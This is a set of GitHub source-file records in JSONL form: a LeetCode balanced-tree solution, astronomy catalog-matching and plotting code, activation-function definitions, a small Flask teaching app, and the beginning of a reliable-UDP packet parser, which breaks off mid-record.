+{"seq_id": "4241746656", "text": "from typing import Optional\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def hight(self, root: TreeNode):\n if root == None:\n return 0\n return max(self.hight(root.left), self.hight(root.right)) + 1\n\n def isBalanced(self, root: Optional[TreeNode]) -> bool:\n if root == None:\n return True\n\n lh = self.hight(root.left)\n rh = self.hight(root.right)\n\n if (\n abs(lh - rh) < 2\n and self.isBalanced(root.left) is True\n and self.isBalanced(root.right) is True\n ):\n return True\n\n return False\n", "repo_name": "inoob26/leetcode", "sub_path": "problems/110.Balanced Binary Tree/solution.py", "file_name": "solution.py", "file_ext": "py", "file_size_in_byte": 767, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Optional", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "69984420010", "text": "import numpy as np\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom matplotlib import rc\nfrom matplotlib.ticker import FormatStrFormatter\nfrom scipy.stats import median_abs_deviation as mad\nfrom scipy.optimize import curve_fit\n \n\ndef cat_sky_match(raref, decref, rain, decin, septol, **kwargs):\n\n '''Written by Gregory Rudnick 9 January 2018\n\n PURPOSE:\n\n Take two lists of ra and dec coordinates in the same units and match\n them within some tolerance.\n\n Plot the differences in each coordinate.\n\n INPUT PARAMETERS:\n\n raref, decref: the reference coordinates in degrees. Numpy arrays.\n\n rain, decin: the input coordinates in degrees. If performing\n coordinate transforms, these would be the ones to be transformed.\n Numpy arrays\n\n septol: the maximum separation allowed for a match. Units are\n arcseconds\n\n OPTIONAL KEYWORD PARAMETERS\n\n matchfile: a name of the file that will contain the reference and\n input coordinates. Suitable for geomap input.\n\n OUTPUT\n\n arrays containing row-matched ras and decs of the reference and input\n coordinates that fall with septol\n\n '''\n\n refcat = SkyCoord(ra=raref*u.degree, dec=decref*u.degree)\n incat = SkyCoord(ra=rain*u.degree, dec=decin*u.degree)\n \n #match catalogs\n (idx, d2d, d3d) = refcat.match_to_catalog_sky(incat)\n #convert distance to arcseconds\n #d2d = d2d*3600\n\n #print(idx,d2d)\n \n #select close matches\n iclose = np.where(d2d < septol/3600.*u.deg)\n #convert tuple to pure array\n iclose=iclose[0]\n\n #print(d2d[indx])\n #print(np.column_stack((raref[iclose],rain[idx[iclose]],d2d[iclose]/u.deg*3600.)))\n\n\n #write files only if \"matchfile\" keyword is set\n keys = sorted(kwargs.keys())\n for kw in keys:\n if kw == 'matchfile':\n #print(kwargs[kw])\n #open file for writing and write a header\n fo = open(kwargs[kw], \"w\")\n fo.write(\"# raref decref rain decin\\n\")\n for i,val in enumerate(iclose):\n #print(i,iclose[i])\n #print(raref[iclose[i]],decref[iclose[i]],rain[idx[iclose[i]]],decin[idx[iclose[i]]])\n fo.write('{} {} {} {}\\n'.format(raref[iclose[i]],decref[iclose[i]],rain[idx[iclose[i]]],decin[idx[iclose[i]]]))\n fo.close()\n\n print(\"RA for matching pairs in spectro catalog\")\n print(raref[iclose])\n print(\"DEC for matching pairs in spectro catalog\")\n print(decref[iclose])\n #store the limits of the coordinates\n lims = {'ramax' : np.amax(raref[iclose]), 'ramin' : np.amin(raref[iclose]), 'decmax' : np.amax(decref[iclose]), 'decmin' : np.amin(decref[iclose])}\n \n #return all matches within the tolerance\n return raref[iclose], decref[iclose], rain[idx[iclose]], decin[idx[iclose]], lims\n\n\n\ndef match_diff_sky_plot(rarefm, decrefm, rainm, decinm, detrend = False, **kwargs):\n\n import matplotlib.pyplot as plt\n\n '''PURPOSE: Plot panels of differences in ra and dec for a set of\n matched catalogs.\n\n INPUT PARAMETERS:\n\n rarefm, decrefm, rainm, decinm: A set of coordinates for matched\n objects. These arrays must all be the same length.\n\n OPTIONAL KEWORD PARAMETERS\n\n plotfile: the name of the file containing the plot\n\n ramin, ramax, decmin, decmax. These are the limits over which the\n transform was originally computed. If these are given then it\n uses those limits to color the points in the ra and decdiff plots.\n If one is given, all must be given.\n\n detrend: Default - False. If True, subtract the best fit line\n from the data and recompute statistics\n\n OUTPUT:\n\n a plot of the differences between the RA and DEC coordinates\n\n '''\n\n #set LaTeX fonts for labels\n rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n rc('text', usetex=True)\n\n \n lims = {'ramax' : np.amax(rarefm), 'ramin' : np.amin(rarefm), 'decmax' : np.amax(decrefm), 'decmin' : np.amin(decrefm)}\n print(\"plotlims are \",lims)\n\n padfac = 0.001\n radiff = (rarefm - rainm)*3600.\n decdiff = (decrefm - decinm)*3600.\n #f, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex='col', sharey='row')\n ralims = [lims['ramin'] - 2./60., lims['ramax'] + 2./60.]\n #ralims = [lims['ramin'] * (1. - padfac), lims['ramax'] * (1. + padfac)]\n\n #handles how to do padding if DECs are positive or negative\n if lims['decmin'] < 0:\n declims = [lims['decmin'] * (1. + padfac/10.), lims['decmax'] * (1. - padfac/10.)]\n else:\n declims = [lims['decmin'] * (1. - padfac/10.), lims['decmax'] * (1. + padfac/10.)]\n yline = [0,0]\n yline1 = [-0.1, -0.1]\n yline2 = [0.1, 0.1]\n\n #finds source outside of ra and dec lims. Assumes that if one\n #keyword is given that all are given\n if 'ramin' in kwargs.keys():\n iin = np.where((rarefm >= kwargs['ramin']) & (rarefm <= kwargs['ramax']) & \\\n (decrefm >= kwargs['decmin']) & (decrefm <= kwargs['decmax']))\n iout = np.where(((rarefm < kwargs['ramin']) | (rarefm > kwargs['ramax'])) | \\\n ((decrefm < kwargs['decmin']) | (decrefm > kwargs['decmax'])))\n \n plt.clf()\n f, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2,figsize=(10,10))\n\n #plot limits\n ypmax = 1.0\n ypmin = -1.0\n nsig_rej = 3.0\n \n #color code the points in and outside the area where transform is\n #valid, if the ra and dec limits are given.\n if 'ramin' in kwargs.keys():\n medradiff = np.median(radiff[iin])\n sigradiff = 1.4826 * mad(radiff[iin])\n #only take points within 3 sigma of the median\n ifit = iin & (abs(radiff - medradiff) < nsig_rej * sigradiff)\n inofit = iin & (abs(radiff - medradiff) >= nsig_rej * sigradiff)\n\n ax1.scatter(rarefm[iout], radiff[iout], color='y', edgecolors='k')\n ax1.scatter(rarefm[iin], radiff[iin], color='c', edgecolors='k')\n ax1.scatter(rarefm[ifit], radiff[ifit], color='b', edgecolors='k')\n\n ##fit line to data\n popt,pcov = curve_fit(flin, rarefm[ifit], radiff[ifit])\n else:\n medradiff = np.median(radiff)\n sigradiff = 1.4826 * mad(radiff)\n\n #only take points within 3 sigma of the median\n ifit = (abs(radiff - medradiff) < nsig_rej * sigradiff)\n inofit = (abs(radiff - medradiff) >= nsig_rej * sigradiff)\n\n ##fit line to data\n popt,pcov = curve_fit(flin, rarefm[ifit], radiff[ifit])\n ax1.scatter(rarefm, radiff, color='c', edgecolors='k')\n ax1.scatter(rarefm[ifit], radiff[ifit], color='b', edgecolors='k')\n\n #plot line fit\n slope= popt[0]\n yint = popt[1]\n print('slope = ',slope, 'yint = ', yint)\n xfit = np.array([min(rarefm),max(rarefm)])\n yfit = xfit * slope + yint\n ax1.plot(xfit,yfit,'g--')\n\n #print(1.002 * ralims[0],medradiff) \n #ax1.text(1.002 * ralims[0], 2.5, medradiff, color='r')\n labsize=14\n ax1.text(np.median(rarefm) - 3./60., 0.85*ypmax,\n r'median($\\Delta RA$) = ' + str(round(medradiff,2)), color='r',fontsize=labsize)\n ax1.text(np.median(rarefm) - 3./60., 0.7*ypmax,\n r'$\\sigma(\\Delta RA$) = ' + str(round(sigradiff,2)), color='r',fontsize=labsize)\n #compute change in delta RA over range in RA\n ax1.text(np.median(rarefm) - 3./60., 0.55*ypmax,\n r'$\\Delta_{tot} RA$ = ' + str(round((max(rarefm) - min(rarefm)) * slope,2)), color='r',fontsize=labsize)\n\n ax1.plot(ralims, yline, color='r')\n ax1.plot(ralims, yline1, color='r', linestyle = ':')\n ax1.plot(ralims, yline2, color='r', linestyle = ':')\n ax1.set_xlim(ralims)\n ax1.set_ylim([ypmin,ypmax])\n ax1.set_ylabel(r'\\Delta RA')\n\n #detrend data if keyword is set\n if detrend:\n radiffcor = radiff - (rarefm * slope + yint)\n ax1.scatter(rarefm[ifit],radiffcor[ifit], color='',edgecolor='m')\n medradiffcor = np.median(radiffcor[ifit])\n sigradiffcor = 1.4826 * mad(radiffcor)\n ax1.text(np.median(rarefm) - 3./60., 0.7*ypmin,\n r'median($\\Delta_{cor} RA$) = ' + str(round(medradiffcor,2)), color='m',fontsize=labsize)\n ax1.text(np.median(rarefm) - 3./60., 0.85*ypmin,\n r'$\\sigma(\\Delta_{cor} RA$) = ' + str(round(sigradiffcor,2)), color='m',fontsize=labsize)\n\n #rarefm, radiff\n\n #color code the points in and outside the area where transform is\n #valid, if the ra and dec limits are given.\n if 'ramin' in kwargs.keys():\n #only take points within 3 sigma of the median\n ifit = iin & (abs(radiff - medradiff) < nsig_rej * sigradiff)\n inofit = iin & (abs(radiff - medradiff) >= nsig_rej * sigradiff)\n\n ax2.scatter(decrefm[iout], radiff[iout], color='y', edgecolors='k')\n ax2.scatter(decrefm[iin], radiff[iin], color='c', edgecolors='k')\n ax2.scatter(decrefm[ifit], radiff[ifit], color='b', edgecolors='k')\n popt,pcov = curve_fit(flin, decrefm[ifit], radiff[ifit]) \n else:\n #only take points within 3 sigma of the median\n ifit = (abs(radiff - medradiff) < nsig_rej * sigradiff)\n inofit = (abs(radiff - medradiff) >= nsig_rej * sigradiff)\n\n ax2.scatter(decrefm, radiff, color='c', edgecolors='k')\n ax2.scatter(decrefm[ifit], radiff[ifit], color='b', edgecolors='k')\n popt,pcov = curve_fit(flin, decrefm[ifit], radiff[ifit])\n\n #plot line fit\n slope= popt[0]\n yint = popt[1]\n print('slope = ',slope, 'yint = ', yint)\n xfit = np.array([min(decrefm),max(decrefm)])\n yfit = xfit * slope + yint\n ax2.plot(xfit,yfit,'g--')\n\n #compute change in delta RA over range in DEC\n ax2.text(np.median(decrefm) - 3./60., 0.55*ypmax,\n r'$\\Delta_{tot} RA$ = ' + str(round((max(decrefm) - min(decrefm)) * slope,2)), color='r',fontsize=labsize)\n\n #ax2.scatter(decrefm, radiff)\n ax2.plot(declims, yline, color='r')\n ax2.plot(declims, yline1, color='r', linestyle = ':')\n ax2.plot(declims, yline2, color='r', linestyle = ':')\n #ax2.set_xticks(np.arange(min(decrefm), max(decrefm)+0.04, 0.04))\n ax2.xaxis.set_major_formatter(FormatStrFormatter('%.3f'))\n ax2.set_xlim(declims)\n ax2.set_ylim([ypmin,ypmax])\n\n\n #detrend data if keyword is set\n if detrend:\n radiffcor = radiff - (decrefm * slope + yint)\n ax2.scatter(decrefm[ifit],radiffcor[ifit], color='',edgecolor='m')\n medradiffcor = np.median(radiffcor[ifit])\n sigradiffcor = 1.4826 * mad(radiffcor)\n ax2.text(np.median(decrefm) - 3./60., 0.7*ypmin,\n r'median($\\Delta_{cor} RA$) = ' + str(round(medradiffcor,2)), color='m',fontsize=labsize)\n ax2.text(np.median(decrefm) - 3./60., 0.85*ypmin,\n r'$\\sigma(\\Delta_{cor} RA$) = ' + str(round(sigradiffcor,2)), color='m',fontsize=labsize)\n\n #color code the points in and outside the area where transform is\n #valid, if the ra and dec limits are given.\n if 'ramin' in kwargs.keys():\n meddecdiff = np.median(decdiff[iin])\n sigdecdiff = 1.4826 * mad(decdiff[iin])\n\n #only take points within 3 sigma of the median\n ifit = iin & (abs(decdiff - meddecdiff) < nsig_rej * sigdecdiff)\n inofit = iin & (abs(decdiff - meddecdiff) >= nsig_rej * sigdecdiff)\n\n ax3.scatter(rarefm[iout], decdiff[iout], color='y', edgecolors='k')\n ax3.scatter(rarefm[iin], decdiff[iin], color='c', edgecolors='k')\n ax3.scatter(rarefm[ifit], decdiff[ifit], color='b', edgecolors='k')\n ##fit line to data\n popt,pcov = curve_fit(flin, rarefm[ifit], decdiff[ifit])\n\n else:\n meddecdiff = np.median(decdiff)\n sigdecdiff = 1.4826 * mad(decdiff)\n\n #only take points within 3 sigma of the median\n ifit = (abs(decdiff - meddecdiff) < nsig_rej * sigdecdiff)\n inofit = (abs(decdiff - meddecdiff) >= nsig_rej * sigdecdiff)\n\n ax3.scatter(rarefm, decdiff, color='c', edgecolors='k')\n ax3.scatter(rarefm[ifit], decdiff[ifit], color='b', edgecolors='k')\n\n ##fit line to data\n popt,pcov = curve_fit(flin, rarefm[ifit], decdiff[ifit])\n\n\n #ax3.text(1.002 * ralims[0], 2.5, meddecdiff, color='r')\n ax3.text(np.median(rarefm) - 3./60., 0.85*ypmax,\n r'median($\\Delta Dec$) = ' + str(round(meddecdiff,2)), color='r',fontsize=labsize)\n ax3.text(np.median(rarefm) - 3./60., 0.7*ypmax,\n r'$\\sigma(\\Delta Dec$) = ' + str(round(sigdecdiff,2)), color='r',fontsize=labsize)\n\n #plot line fit\n slope= popt[0]\n yint = popt[1]\n print('slope = ',slope, 'yint = ', yint)\n xfit = np.array([min(rarefm),max(rarefm)])\n yfit = xfit * slope + yint\n ax3.plot(xfit,yfit,'g--')\n\n #compute change in delta DEC over range in RA\n ax3.text(np.median(rarefm) - 3./60., 0.55*ypmax,\n r'$\\Delta_{tot} Dec$ = ' + str(round((max(rarefm) - min(rarefm)) * slope,2)), color='r',fontsize=labsize)\n #ax3.scatter(rarefm, decdiff)\n ax3.plot(ralims, yline, color='r')\n ax3.plot(ralims, yline1, color='r', linestyle = ':')\n ax3.plot(ralims, yline2, color='r', linestyle = ':')\n ax3.set_xlim(ralims)\n ax3.set_ylim([ypmin,ypmax])\n ax3.set_xlabel(r'RA')\n ax3.set_ylabel(r'\\Delta Dec')\n \n if detrend:\n decdiffcor = decdiff - (rarefm * slope + yint)\n ax3.scatter(rarefm[ifit],decdiffcor[ifit], color='',edgecolor='m')\n meddecdiffcor = np.median(decdiffcor[ifit])\n sigdecdiffcor = 1.4826 * mad(decdiffcor)\n ax3.text(np.median(rarefm) - 3./60., 0.7*ypmin,\n r'median($\\Delta_{cor} Dec$) = ' + str(round(meddecdiffcor,2)), color='m',fontsize=labsize)\n ax3.text(np.median(rarefm) - 3./60., 0.85*ypmin,\n r'$\\sigma(\\Delta_{cor} Dec$) = ' + str(round(sigdecdiffcor,2)), color='m',fontsize=labsize)\n\n #color code the points in and outside the area where transform is\n #valid, if the ra and dec limits are given.\n if 'ramin' in kwargs.keys():\n #only take points within 3 sigma of the median\n ifit = iin & (abs(decdiff - meddecdiff) < nsig_rej * sigdecdiff)\n inofit = iin & (abs(decdiff - meddecdiff) >= nsig_rej * sigdecdiff)\n\n ax4.scatter(decrefm[iout], decdiff[iout], color='y', edgecolors='k')\n ax4.scatter(decrefm[iin], decdiff[iin], color='c', edgecolors='k')\n ax4.scatter(decrefm[ifit], decdiff[ifit], color='b', edgecolors='k')\n ##fit line to data\n popt,pcov = curve_fit(flin, decrefm[ifit], decdiff[ifit])\n\n else:\n #only take points within 3 sigma of the median\n ifit = (abs(decdiff - meddecdiff) < nsig_rej * sigdecdiff)\n inofit = (abs(decdiff - meddecdiff) >= nsig_rej * sigdecdiff)\n\n ax4.scatter(decrefm, decdiff, color='c', edgecolors='k')\n ax4.scatter(decrefm[ifit], decdiff[ifit], color='b', edgecolors='k')\n ##fit line to data\n popt,pcov = curve_fit(flin, decrefm[ifit], decdiff[ifit])\n\n #plot line fit\n slope= popt[0]\n yint = popt[1]\n print('slope = ',slope, 'yint = ', yint)\n xfit = np.array([min(decrefm),max(decrefm)])\n yfit = xfit * slope + yint\n ax4.plot(xfit,yfit,'g--')\n\n\n #compute change in delta DEC over range in DEC\n ax4.text(np.median(decrefm) - 3./60., 0.55*ypmax,\n r'$\\Delta_{tot} RA$ = ' + str(round((max(decrefm) - min(decrefm)) * slope,2)), color='r',fontsize=labsize)\n # ax4.scatter(decrefm, decdiff)\n ax4.plot(declims, yline, color='r')\n ax4.plot(declims, yline1, color='r', linestyle = ':')\n ax4.plot(declims, yline2, color='r', linestyle = ':')\n #ax4.set_xticks(np.arange(min(decrefm), max(decrefm)+0.04, 0.04))\n ax4.xaxis.set_major_formatter(FormatStrFormatter('%.3f'))\n ax4.set_xlim(declims)\n ax4.set_ylim([ypmin,ypmax])\n ax4.set_xlabel(r'Dec')\n\n if detrend:\n decdiffcor = decdiff - (decrefm * slope + yint)\n ax4.scatter(decrefm[ifit],decdiffcor[ifit], color='',edgecolor='m')\n meddecdiffcor = np.median(decdiffcor[ifit])\n sigdecdiffcor = 1.4826 * mad(decdiffcor)\n ax4.text(np.median(decrefm) - 3./60., 0.7*ypmin,\n r'median($\\Delta_{cor} Dec$) = ' + str(round(meddecdiffcor,2)), color='m',fontsize=labsize)\n ax4.text(np.median(decrefm) - 3./60., 0.85*ypmin,\n r'$\\sigma(\\Delta_{cor} Dec$) = ' + str(round(sigdecdiffcor,2)), color='m',fontsize=labsize)\n\n keys = sorted(kwargs.keys())\n for kw in keys:\n if kw == 'plotfile':\n plt.savefig(kwargs[kw])\n plt.show()\n #print(\"done with plot\")\n #plt.close()\n \n return medradiff, meddecdiff\n\n#function for a straight line fit\ndef flin(x,A,B):\n return A*x + B\n", "repo_name": "grudnick/Catalog_code", "sub_path": "catalog_match_sky_trans.py", "file_name": "catalog_match_sky_trans.py", "file_ext": "py", "file_size_in_byte": 16637, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "astropy.coordinates.SkyCoord", "line_number": 44, "usage_type": "call"}, {"api_name": "astropy.units.degree", "line_number": 44, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 44, "usage_type": "name"}, {"api_name": "astropy.coordinates.SkyCoord", "line_number": 45, "usage_type": "call"}, {"api_name": "astropy.units.degree", "line_number": 45, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 55, "usage_type": "call"}, {"api_name": "astropy.units.deg", "line_number": 55, "usage_type": "attribute"}, {"api_name": "astropy.units", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.amax", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.rc", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.rc", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 151, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 151, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}, {"api_name": "numpy.median", "line_number": 162, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 163, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 175, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 176, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 217, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 221, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 236, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 272, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 276, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 282, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 283, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 296, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 297, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 325, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 339, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 341, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 343, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 357, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 373, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 379, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 394, "usage_type": "call"}, {"api_name": "scipy.stats.median_abs_deviation", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 396, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 398, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 404, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 404, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 405, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 405, "usage_type": "name"}]}
+{"seq_id": "29353934987", "text": "# Grabbed from https://github.com/siebenrock/activation-functions/blob/master/activation_functions.ipynb to avoid keras dependency or whatever\nimport math\n\n\nACTIVATIONS = {'id':lambda x: x,\n 'pw':lambda x: 2*(1 if x > 3 else 0 if x < -3 else 1/6*x+1/2)-1.0,\n 'hs':lambda x: 1 if x > 0 else -1,\n 'sg':lambda x: 2*(1 / (1 + math.exp(-x)))-1.0,\n 'bs':lambda x: (1 - math.exp(-x)) / (1 + math.exp(-x)),\n 'ht':lambda x: 2 / (1 + math.exp(-2 * x)) -1,\n 'at':lambda x: (2/math.pi)*math.atan(x),\n 'st':lambda x: (2/math.pi)*math.atan(max(0.1 * x, x)),\n 'et':lambda x: (2/math.pi)*math.atan(x) if x > 0 else 0.5 * (math.exp(x) - 1)}\n\nINVERSE_ACTIVATIONS = {'id': lambda y: y,\n 'ht': lambda y: -0.5*math.log(2/(y+1)-1) if y<1 else 100000000,\n 'ln': lambda y: 5*(y-0.5) }\n\nif __name__=='__main__':\n import matplotlib.pyplot as plt\n x = [0.01*i for i in range(-500,500)]\n xf_interleaved = list()\n for ac,f in ACTIVATIONS.items():\n xf_interleaved.append(x)\n xf_interleaved.append([f(xi) for xi in x])\n plt.plot(*xf_interleaved)\n plt.legend(list(ACTIVATIONS.keys()))\n plt.show()\n print(math.atan(41))\n\n def one(x):\n y = ACTIVATIONS['ht'](x)\n return INVERSE_ACTIVATIONS['ht'](y)\n\n print(one(0.8))\n\n\n\n\n\n\n\n\n", "repo_name": "microprediction/recalibrate", "sub_path": "recalibrate/unarytransforms/activation.py", "file_name": "activation.py", "file_ext": "py", "file_size_in_byte": 1405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "math.exp", "line_number": 8, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 9, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 10, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 11, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 11, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 12, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 12, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 13, "usage_type": "attribute"}, {"api_name": "math.atan", "line_number": 13, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 13, "usage_type": "call"}, {"api_name": "math.log", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "math.atan", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "20997979923", "text": "from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\ncities_list = [\"Göteborg\", \"Linköping\", \"Enköping\", \"Skövde\", \"Mölndal\"]\n\n#render_template letar efter html filer i /templates mappen.\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\", title=\"Kristians hemsida\", show_paragraph=True, cities=cities_list) #Jag kan skicka med olika typer av variabler i min render_template\n# det är render_template() som ser till att variablerna renderas in i html. Den kör igenom logiken och returnerar korrekt html. \n\n@app.route(\"/submit\", methods=[\"POST\"])\ndef submit():\n print(request.form[\"email\"]) #Data från formulär kommer du åt via request.form\n return \"Tack formuläret har skickats in!\"\n\n\"\"\"\n1. render_template(). Vilken mapp letar den i?\n2. variabler i template {{variable}}\n3. if-statements {% if condition %}\n4. for loops {% for item in list %}\n5. formulär\n\"\"\"", "repo_name": "kristiannilsson/python-course", "sub_path": "lektion6_templates/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 916, "program_lang": "python", "lang": "sv", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 3, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}]}
+{"seq_id": "8417764518", "text": "# A framework for reliable udp\r\n\r\nimport logging\r\nimport random\r\nimport socket\r\nimport struct\r\n\r\nfrom enum import IntEnum\r\nfrom utils import States\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nmax_initial_sequence_no = 65536 * 1024\r\n\r\nclass ControlBits(IntEnum):\r\n FIN = 1\r\n SYN = 2\r\n RST = 4\r\n PSH = 8\r\n ACK = 16\r\n URG = 32\r\n ECE = 64\r\n CWR = 128\r\n\r\nclass OptionBits(IntEnum):\r\n END_OF_OPTION_LIST = 0\r\n NO_OPERATION = 1\r\n MAX_SEGMENT_SIZE = 2\r\n\r\n# unsupported option extensions\r\n# SACK\r\n# TIMESTAMP\r\n# WINDOW_SCALE\r\n \r\ndef calc_checksum(data: bytes) -> int:\r\n \"\"\"Calculates the TCP checksum for a byte array of data\"\"\"\r\n\r\n # The checksum field is the 16-bit ones' complement of the ones' complement sum of all 16-bit words in the\r\n # header and text. The checksum computation needs to ensure the 16-bit alignment of the data being\r\n # summed. If a segment contains an odd number of header and text octets, alignment can be achieved by\r\n # padding the last octet with zeros on its right to form a 16-bit word for checksum purposes. The pad is not\r\n # transmitted as part of the segment. While computing the checksum, the checksum field itself is replaced\r\n # with zeros.\r\n\r\n if len(data) % 2 == 1:\r\n # if the input is not aligned (2-byte) then add a null padding octet\r\n data += b\"\\x00\"\r\n\r\n # unpack the data into an array of unsigned shorts\r\n words = struct.unpack(\"!%dH\" % (len(data) // 2), data)\r\n # sum the unsigned shorts\r\n chksum = sum(words)\r\n # one's complement\r\n #chksum = ~chksum\r\n\r\n # this is the long way with bit rotation logic\r\n chksum = (chksum >> 16) + (chksum & 0xffff)\r\n chksum += chksum >> 16\r\n chksum = ~chksum & 0xffff\r\n\r\n return chksum\r\n\r\n\r\n\r\nclass Packet:\r\n def __init__(self, data: bytes, addr: tuple):\r\n # the 'tcp' header should be 20-octets\r\n if len(data) < 20:\r\n raise ValueError(f'error processing packet from {addr} of length {len(data)}')\r\n\r\n self.addr = addr\r\n (\r\n self.src_port,\r\n self.dst_port,\r\n self.seq_no,\r\n self.ack_no,\r\n offset_and_reserved,\r\n self.control_bits,\r\n self.window_size,\r\n self.checksum,\r\n self.urgent\r\n ) = struct.unpack(\"!HHIIBBHHH\", data[0:20])\r\n\r\n # offset\r\n self.offset = offset_and_reserved >> 4\r\n # reserved\r\n self.reserved = offset_and_reserved & 0x0f\r\n # there may be option data between 21 and 21 + offset\r\n doffset = 21 + self.offset\r\n # extract the options\r\n self.options = data[21:doffset]\r\n # extract the payload (if any)\r\n self.data = data[doffset:]\r\n \r\n def __repr__(self):\r\n return repr({\r\n 'addr' : self.addr,\r\n 'src_port' : self.src_port,\r\n 'dst_port' : self.dst_port,\r\n 